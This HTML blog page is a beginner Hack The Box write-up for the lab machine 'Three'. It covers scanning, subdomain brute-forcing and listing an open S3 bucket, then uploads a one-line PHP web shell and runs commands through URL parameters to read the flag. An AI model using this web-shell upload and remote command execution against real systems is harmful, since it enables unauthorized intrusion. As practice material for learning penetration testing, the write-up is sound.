<!DOCTYPE html>
<html lang="en">
<head>
  
    <title>HTB-Three :: ML</title>
  
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="HTB-three writeup" />
<meta name="keywords" content="" />
<meta name="robots" content="noodp" />
<link rel="canonical" href="/posts/three/" />




<link rel="stylesheet" href="/assets/style.css">

  <link rel="stylesheet" href="/assets/blue.css">



<link rel="stylesheet" href="/style.css">


<link rel="apple-touch-icon" href="/img/apple-touch-icon-192x192.png">

  <link rel="shortcut icon" href="/img/favicon/blue.png">



<meta name="twitter:card" content="summary" />

  
    <meta name="twitter:site" content="" />
  
    <meta name="twitter:creator" content="" />



<meta property="og:locale" content="en" />
<meta property="og:type" content="article" />
<meta property="og:title" content="HTB-Three">
<meta property="og:description" content="HTB-three writeup" />
<meta property="og:url" content="/posts/three/" />
<meta property="og:site_name" content="ML" />

  
    <meta property="og:image" content="/img/favicon/blue.png">
  

<meta property="og:image:width" content="2048">
<meta property="og:image:height" content="1024">


  <meta property="article:published_time" content="2022-09-15 14:57:26 &#43;0200 CEST" />












</head>
<body class="blue">


<div class="container center headings--one-size">

  <header class="header">
  <div class="header__inner">
    <div class="header__logo">
      <a href="/">
  <div class="logo">
    Home
  </div>
</a>

    </div>
    
      <div class="menu-trigger">menu</div>
    
  </div>
  
    <nav class="menu">
  <ul class="menu__inner menu__inner--desktop">
    
      
        
          <li><a href="/about">About</a></li>
        
      
        
          <li><a href="/challenges">Challenges</a></li>
        
      
        
          <li><a href="https://github.com/theElandor">Github</a></li>
        
      
      
        <ul class="menu__sub-inner">
          <li class="menu__sub-inner-more-trigger">Uni-Notes ▾</li>

          <ul class="menu__sub-inner-more hidden">
            
              
                <li><a href="/gestione">Inform. Retrieval</a></li>
              
            
              
                <li><a href="/compilatori">Linguaggi e Compilatori</a></li>
              
            
              
                <li><a href="/ml">Machine Learning and Deep Learning</a></li>
              
            
              
                <li><a href="/reti">Reti</a></li>
              
            
          </ul>
        </ul>
      
    

    
  </ul>

  <ul class="menu__inner menu__inner--mobile">
    
      
        <li><a href="/about">About</a></li>
      
    
      
        <li><a href="/challenges">Challenges</a></li>
      
    
      
        <li><a href="https://github.com/theElandor">Github</a></li>
      
    
      
        <li><a href="/gestione">Inform. Retrieval</a></li>
      
    
      
        <li><a href="/compilatori">Linguaggi e Compilatori</a></li>
      
    
      
        <li><a href="/ml">Machine Learning and Deep Learning</a></li>
      
    
      
        <li><a href="/reti">Reti</a></li>
      
    
    
  </ul>
</nav>

  
</header>


  <div class="content">
    
<div class="post">
  <h1 class="post-title">
    <a href="/posts/three/">HTB-Three</a></h1>
  <div class="post-meta">
    
      <span class="post-date">
        2022-09-15
        
      </span>
    
    
    
  </div>

  
  


  

  <div class="post-content"><div>
        
  <figure class="left" >
    <img src="/ox-hugo/three.png"   />
    
  </figure>


<h2 id="introduction">Introduction<a href="#introduction" class="hanchor" ariaLabel="Anchor">&#8983;</a> </h2>
<p>Hi everyone,</p>
<p>this is my first HTB-writeup. It is about the starting
point machine <strong>three</strong>, which is made for beginners.
I think that many people could find this walkthrough
usefull if they are just starting with penetration-testing.</p>
<p>Enjoy.</p>
<h2 id="connect-to-htb">Connect to htb<a href="#connect-to-htb" class="hanchor" ariaLabel="Anchor">&#8983;</a> </h2>
<p>To connect to your hack the box account, you need <strong>openvpn</strong>.
You can install it easily using the following comand:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">sudo apt install openvpn
</code></pre></div><p>After that, you have to download the .ovpn file from the
htb website. Click on &ldquo;connect to htb&rdquo;, then click on &ldquo;Starting Point&rdquo;.
Select &ldquo;TCP&rdquo; as protocol and just download the file.</p>
<p>Now you are ready to connect using the following comand:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">sudo openvpn &lt;filename.ovpn&gt;
</code></pre></div><h2 id="preparation">Preparation<a href="#preparation" class="hanchor" ariaLabel="Anchor">&#8983;</a> </h2>
<p>After you connected to htb using <strong>openvpn</strong>, you can
<strong>spawn the machine</strong> by clicking on the yellow button.</p>

  <figure class="left" >
    <img src="/ox-hugo/spawn.png"   />
    
  </figure>


<p>Now the IP adress of the machine should pop up.
It is really important to save it in your /etc/hosts file.
You can do it by adding the following line to the file:</p>
<pre tabindex="0"><code class="language-example" data-lang="example">&lt;ip_addr&gt;    three
</code></pre><p>Now you can test if the host is up and running.</p>
<p>Just use the <strong>ping</strong> command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">ping three
</code></pre></div><h2 id="enumeration">Enumeration<a href="#enumeration" class="hanchor" ariaLabel="Anchor">&#8983;</a> </h2>
<p>As it&rsquo;s well known, to begin a penetration test it is always
important to scan the target. I generally use <strong>nmap</strong> with a couple
of flags, as shown below:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">sudo nmap -sC -sV three
</code></pre></div><p>This basic scan will launch a series of default scripts and
will provide more information on the versions of the services
that are running on open ports. Here&rsquo;s the output that I got:</p>
<pre tabindex="0"><code class="language-example" data-lang="example">Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-15 10:14 CEST
Nmap scan report for three (10.129.101.217)
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
|   256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
|_  256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Toppers
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.69 seconds
</code></pre><p>We can notice that an Apache server is running on port 80.
Let&rsquo;s try to navigate to <a href="http://three:80">http://three:80</a> to see the website.
Always play around with the web-page to discover vulnerabilites.</p>

  <figure class="left" >
    <img src="/ox-hugo/thetoppers.png"   />
    
  </figure>


<p>As the hint says, let&rsquo;s edit our /etc/hosts file, editing
the line that we added before:</p>
<pre tabindex="0"><code class="language-example" data-lang="example">&lt;ip_addr&gt;    thetoppers.htb
</code></pre><h2 id="gobuster">Gobuster<a href="#gobuster" class="hanchor" ariaLabel="Anchor">&#8983;</a> </h2>
<p>Performing a in-depth search of hidden (non-protected) files
and resources of a website is often a good starting point
during a penetration test.
This time htb helps us, and suggests to perform a sub-domain
enumeration. To do that, we can use a really famous brute-force tool
called <strong>gobuster</strong>.
To do that, we first need a <em>wordlist</em> that gobuster can
use. You can find many wordlists on the internet, containing
the most common words and expressions used in subdomains, but
this time we will create our own wordlist.
Look carefully at the hint that htb gives:</p>

  <figure class="left" >
    <img src="/ox-hugo/hint.png"   />
    
  </figure>


<p>We can see that there&rsquo;s probably a 2-character combination
that we have to find before the url.</p>
<p>The simplest thing to do here is generating all the permutations of 2-character words.
(including lowercase letters and numeric characters from 1 to 9).
We can do that by using a tool called crunch (pre-installed on kali linux):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">crunch <span style="color:#ae81ff">2</span> <span style="color:#ae81ff">2</span> abcdefghijklmnopqrstuvwxyz0123456789 &gt; output.txt
</code></pre></div><p>Now we are ready to use gobuster in vhost mode (it will look
for subdomains by visiting the generated URLs).</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">sudo gobuster vhost -u http://thetoppers.htb -w /home/matte/output.txt
</code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://thetoppers.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /home/matte/output.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/09/15 10:23:28 Starting gobuster in VHOST enumeration mode
===============================================================
Found: s3.thetoppers.htb (Status: 502) [Size: 424]

===============================================================
2022/09/15 10:23:47 Finished
===============================================================
</code></pre></div><p>Here&rsquo;s our hidden subdomain: <strong>s3.thetoopers.htb</strong>.
Let&rsquo;s add it to our /etc/hosts file, editing
the same line as before.
Here&rsquo;s how my /etc/hosts file looks after this edit:</p>
<pre tabindex="0"><code class="language-example" data-lang="example">127.0.0.1       localhost
127.0.1.1       kali
10.129.101.217  thetoppers.htb s3.thetoppers.htb
</code></pre><h2 id="aws">AWS<a href="#aws" class="hanchor" ariaLabel="Anchor">&#8983;</a> </h2>
<p>This is what we get if we navigate to <a href="http://s3.thetoppers.htb">http://s3.thetoppers.htb</a>:</p>

  <figure class="left" >
    <img src="/ox-hugo/s3.png"   />
    
  </figure>


<p>The subdomain is running <strong>Amazon s3 (Simple Storage Service)</strong>, which is a web-based
cloud storage service. To interact with it, we can use
the <strong>aws</strong> command line interface, called <strong>awscli</strong>.
To access the <strong>buckets</strong> (&ldquo;folders&rdquo; containing files) that the server is hosting, we
should setup the credentials. Sometimes online
contents of this kind are not protected, and you can access them even
without knowing security keys or passwords.
Let&rsquo;s do it to see if this is the case.</p>
<p>Use the following command to open an interactive menu
to setup your credentials (you can type random words. If
you don&rsquo;t, the connection will not work properly).</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">aws configure
</code></pre></div><p>What we can do now is try to see if we can list the buckets
that are hosted. We have to specify:</p>
<ol>
<li>The <strong>endpoint</strong>, that is the url where the s3 service is hosted;</li>
<li>The command that we want to use, in this case <strong>ls</strong>;</li>
</ol>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">aws --endpoint<span style="color:#f92672">=</span>http://s3.thetoppers.htb s3 ls
</code></pre></div><p>Here&rsquo;s the output that we get:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">2022-09-15 10:33:39 thetoppers.htb
</code></pre></div><p>which means that there is an actual bucket hosted there.
Let&rsquo;s try to list the content of that bucket, using
this command (in this case we have to specify that we want
to use the s3 protocol to get the objects inside that bucket):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">aws --endpoint<span style="color:#f92672">=</span>http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
</code></pre></div><p>Here&rsquo;s the output that we get:</p>
<pre tabindex="0"><code class="language-example" data-lang="example">			   PRE images/
2022-09-15 10:33:39          0 .htaccess
2022-09-15 10:33:39      11952 index.php
</code></pre><h2 id="php">PHP<a href="#php" class="hanchor" ariaLabel="Anchor">&#8983;</a> </h2>
<p>The website is configured to run php files, so we might try
to inject php files somehow.
One thing we can try to do is uploading a php shell
in the bucket, by using the <strong>cp</strong> command, that takes
a local file as the input.
I wrote the most basic shell you can have in php, this
is the source code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-php" data-lang="php"><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span> <span style="color:#a6e22e">system</span>($_GET[<span style="color:#e6db74">&#34;cmd&#34;</span>]); <span style="color:#75715e">?&gt;</span><span style="color:#960050;background-color:#1e0010">
</span></code></pre></div><p>Otherwise, you can find many reverse shell on this website:  <a href="https://www.revshells.com/">https://www.revshells.com/</a>.</p>
<p>Down below you can see how you can copy a file inside a bucket, you simply use <strong>cp</strong>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">aws --endpoint<span style="color:#f92672">=</span>http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
</code></pre></div><p>You can then re-run the list command to see that the shell was
succesfully uploaded.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">                           PRE images/
2022-09-15 10:33:39          0 .htaccess
2022-09-15 10:33:39      11952 index.php
2022-09-15 12:24:13         64 shell.php
</code></pre></div><h2 id="get-root-flag">Get root flag<a href="#get-root-flag" class="hanchor" ariaLabel="Anchor">&#8983;</a> </h2>
<p>Now that we injected the php file that the webserver
can process, we can send remote commands by
modifying and navigating to this URL:  <a href="http://thetoppers.htb/reverse.php?cmd">http://thetoppers.htb/reverse.php?cmd</a>=&lt;any_command&gt;.
For example, you can list the files in the bucket like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">http://thetoppers.htb/reverse.php?cmd=ls+../
</code></pre></div><p><strong><em>And there&rsquo;s the flag!</em></strong></p>
<p>To actually see the content of the flag.txt file you can send this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-text" data-lang="text">http://thetoppers.htb/reverse.php?cmd=cat+../flag.txt
</code></pre></div><p>If the web-browser redirects you to some other web page,
you can also use tools like <strong>wget</strong>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">wget http://thetoppers.htb/reverse.php?cmd<span style="color:#f92672">=</span>cat+../flag.txt
</code></pre></div><blockquote>
<p>root flag: a980d99281a28d638ac68b9bf9453c2b</p>
</blockquote>

      </div></div>

  
  
<div class="pagination">
    <div class="pagination__title">
        <span class="pagination__title-h">Read other posts</span>
        <hr />
    </div>
    <div class="pagination__buttons">
        
        <span class="button previous">
            <a href="/posts/archetype/">
                <span class="button__icon">←</span>
                <span class="button__text">HTB-Archetype</span>
            </a>
        </span>
        
        
    </div>
</div>

  

  
  <script>
  MathJax = {
    tex: {
      inlineMath: [['$', '$'], ['\\(', '\\)']],
      displayMath: [['$$','$$'], ['\\[', '\\]']],
      processEscapes: true,
      processEnvironments: true
    },
    options: {
      skipHtmlTags: ['script', 'noscript', 'style', 'textarea', 'pre']
    }
  };

  window.addEventListener('load', (event) => {
      document.querySelectorAll("mjx-container").forEach(function(x){
        x.parentElement.classList += 'has-jax'})
    });

</script>
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>

  
</div>

  </div>

  
    <footer class="footer">
  <div class="footer__inner">
    
      <div class="copyright">
        <span>© 2025 Powered by <a href="http://gohugo.io">Hugo</a></span>
    
        <span>:: Theme made by <a href="https://twitter.com/panr">panr</a></span>
      </div>
  </div>
</footer>

<script src="/assets/main.js"></script>
<script src="/assets/prism.js"></script>







  
</div>

</body>
</html>
